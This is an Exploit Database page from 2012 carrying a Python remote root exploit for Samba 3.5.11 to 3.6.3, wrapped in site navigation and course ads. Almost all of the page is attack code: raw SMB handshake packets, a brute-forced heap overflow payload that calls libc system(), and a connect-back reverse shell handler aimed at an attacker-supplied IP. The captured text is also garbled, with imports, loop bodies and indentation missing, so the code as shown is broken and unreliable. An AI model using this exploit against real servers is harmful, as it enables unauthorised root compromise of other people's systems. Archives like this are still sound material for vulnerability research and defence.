Professional Documents
Culture Documents
Samba 3.5.11 - 3.6.3 - Remote Code Execution
Samba 3.5.11 - 3.6.3 - Remote Code Execution
Samba 3.5.11 - 3.6.3 - Remote Code Execution
GET CERTIFIED
Samba 3.5.11/3.6.3 - Remote Code Execution
Become a Certi ed
EDB-ID: CVE: Author: Type: Platform Date:
Penetration Tester
37834 N/A KB REMOTE
: 2012-09-24
Enroll in Penetration Testing with
LINUX
Kali Linux , the course required to
become an Offensive Security
EDB Veri ed: Exploit: / Certi ed Professional (OSCP)
Vulnerable App:
GET CERTIFIED
Copy
source: https://www.securityfocus.com/bid/55655/info
An attacker can exploit this issue to execute arbitrary code with root privileges. Failed exploit attempts will cause a
denial-of-service condition.
#!/usr/bin/python
#
# finding targets 4 31337z:
# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e "print system"` | grep
'$1'
# -> to get system_libc_addr, enter this value in the 'system_libc_offset' value of the target_finder, run, sit back, wait
for shell
# found by eax samba 0day godz (loljk)
targets = [
{
"name" : "samba_3.6.3-debian6",
"chunk_offset" : 0x9148,
"system_libc_offset" : 0xb6d003c0
},
{
"name" : "samba_3.5.11~dfsg-1ubuntu2.1_i386 (oneiric)",
"chunk_offset" : 4560,
"system_libc_offset" : 0xb20
},
{
"name" : "target_finder (hardcode correct system addr)",
"chunk_offset" : 0,
"system_libc_offset" : 0xb6d1a3c0,
"finder": True
}
]
do_brute = True
rs = 1024
FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
sploitshake = [
# HELLO
"8100004420434b4644454e4543464445" + \
"46464346474546464343414341434143" + \
"41434143410020454745424644464545" + \
"43455046494341434143414341434143" + \
"4143414341414100",
# NTLM_NEGOT
"0000002fff534d427200000000000000" + \
"00000000000000000000000000001d14" + \
"00000000000c00024e54204c4d20302e" + \
"313200",
# SESSION_SETUP
"0000004bff534d427300000000080000" + \
"000000000000000000000000ffff1d14" + \
"000000000dff000000ffff02001d1499" + \
"1f00000000000000000000010000000e" + \
"000000706f736978007079736d6200",
# TREE_CONNECT
"00000044ff534d427500000000080000" + \
"000000000000000000000000ffff1d14" + \
"6400000004ff00000000000100190000" + \
"5c5c2a534d425345525645525c495043" + \
"24003f3f3f3f3f00",
# NT_CREATE
"00000059ff534d42a200000000180100" + \
"00000000000000000000000001001d14" + \
"6400000018ff00000000050016000000" + \
"000000009f0102000000000000000000" + \
"00000000030000000100000040000000" + \
"020000000306005c73616d7200"
]
pwnsauce = {
'smb_bind': \
"00000092ff534d422500000000000100" + \
"00000000000000000000000001001d14" + \
"6400000010000048000004e0ff000000" + \
"0000000000000000004a0048004a0002" + \
"002600babe4f005c504950455c000500" + \
"0b03100000004800000001000000b810" + \
"b8100000000001000000000001007857" + \
"34123412cdabef000123456789ab0000" + \
"0000045d888aeb1cc9119fe808002b10" + \
"486002000000",
'data_chunk': \
"000010efff534d422f00000000180000" + \
"00000000000000000000000001001d14" + \
"640000000eff000000babe00000000ff" + \
"0000000800b0100000b0103f00000000" + \
"00b0100500000110000000b010000001" + \
"0000009810000000000800",
'final_chunk': \
"000009a3ff534d422f00000000180000" + \
"00000000000000000000000001001d14" + \
"640000000eff000000babe00000000ff" + \
"00000008006409000064093f00000000" + \
"00640905000002100000006409000001" + \
"0000004c09000000000800"
}
chunk_size = 4248
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target_tcp)
n = 0
for pkt in sploitshake:
s.send(unhexlify(pkt))
pkt_res = s.recv(rs)
n = n+1
s.send(unhexlify(pwnsauce['smb_bind'].replace("babe", fid)))
pkt_res = s.recv(rs)
buf+=struct.pack("I", 0);
buf+=struct.pack("I", target['system_libc_offset']);
buf+=struct.pack("I", 0);
buf+=struct.pack("I", target['system_libc_offset']);
buf+=struct.pack("I", 0xe8150c70);
buf+="AAAABBBB"
tmp = cmd*(816/len(cmd))
tmp += "\x00"*(816-len(tmp))
buf+=tmp
buf+="A"*(37192-target['chunk_offset'])
buf+='z'*(100000 - (28000 + 10000))
s.close()
class connectback_shell(SocketServer.BaseRequestHandler):
def handle(self):
global do_brute
s = self.request
os.write(s.fileno() if i == 0 else 1, c)
except KeyboardInterrupt: pass
finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings)
return
if len(sys.argv) != 6:
print "\n {*} samba 3.x remote root by kd(eax)@ireleaseyourohdayfuckyou {*}\n"
print " usage: %s <targethost> <targetport> <myip> <myport> <target>\n" % (sys.argv[0])
print " targets:"
i = 0
for target in targets:
print " %02d) %s" % (i, target['name'])
i = i+1
print ""
sys.exit(-1)
target = targets[int(sys.argv[5])]
if "finder" in target:
target['chunk_offset'] += 4
else:
target['system_libc_offset'] += 0x1000
if "finder" in target:
print \
"{!} found \x1b[32mNEW\x1b[0m target: chunk_offset = ~%d, " \
"system_libc_offset = 0x%03x" % \
(target['chunk_offset'], target['system_libc_offset'] & 0xff000fff)
while 1:
time.sleep(999)
server.shutdown()
Kali Linux OSCP Penetration Testing with Kali Linux (PWK) Penetration Testing
Kali NetHunter OSWP Advanced Web Attacks and Exploitation (AWAE) Advanced Attack Simulation
Kali Linux Revealed Book OSCE Offensive Security Wireless Attacks (WiFu) Application Security Assessment
EXPLOIT DATABASE BY OFFENSIVE SECURITY TERMS PRIVACY ABOUT US FAQ © Copyright 2019, Exploit Database